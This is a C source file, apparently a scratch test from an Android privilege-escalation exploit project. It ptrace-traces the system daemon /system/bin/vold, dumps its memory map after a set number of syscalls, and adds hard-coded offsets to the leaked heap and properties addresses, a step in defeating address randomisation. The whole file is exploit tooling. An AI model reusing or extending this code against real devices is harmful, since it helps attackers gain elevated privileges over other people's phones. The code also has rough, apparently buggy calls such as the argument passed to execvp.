src/ht-android-shellcode/shared_object_eop/jni/test4.c~
#include <stdio.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <linux/user.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdlib.h>
#define SYSCOUNT 400
#define OFF1 0x1e0
#define OFF2 0x111cd4
int main(int argc, char ** argv) {
int status;
pid_t child;
int i = 0;
char cmd[64];
char vold_bin[] = "/system/bin/vold";
char *dump_file = "dumped_mem";
int syscount = 0;
FILE *file = NULL;
char heap[9];
char stack[9];
long val, val2;
execvp(vold_bin, &vold_bin);
child = fork();
if(child == 0) {
ptrace(PTRACE_TRACEME, 0, NULL, NULL);
execvp(vold_bin, &vold_bin);
}
else {
memset(cmd, 0, sizeof(cmd));
snprintf(cmd, sizeof(cmd), "cat /proc/%d/maps > %s", child, dump_file);
wait(&status);
if(WIFEXITED(status))
_exit (WEXITSTATUS(status));
ptrace(PTRACE_SYSCALL, child, NULL, NULL);
wait(&status);
while (1) {
i++;
if(i == SYSCOUNT) {
system(cmd);
exit(0);
}
if(WIFEXITED(status))
break;
ptrace(PTRACE_SYSCALL, child, NULL, NULL);
wait(&status);
}
}
file = fopen ( dump_file, "r" );
if ( file != NULL )
{
char line [ 300 ]; /* or other suitable maximum line size */
while ( fgets ( line, sizeof line, file ) != NULL ) /* read a line */
{
if(strstr(line, "[heap]")) {
memcpy(heap, line, 8);
heap[8] = '\0';
sscanf(heap, "%x", &val);
printf("%x\n", val+OFF1);
}
if(strstr(line, "/dev/__properties__")) {
memcpy(stack, line+9, 8);
stack[8] = '\0';
sscanf(stack, "%x", &val2);
printf("%x\n", val2+OFF2);
}
}
fclose ( file );
}
else
{
perror ( dump_file ); /* why didn't the file open? */
}
return 0;
}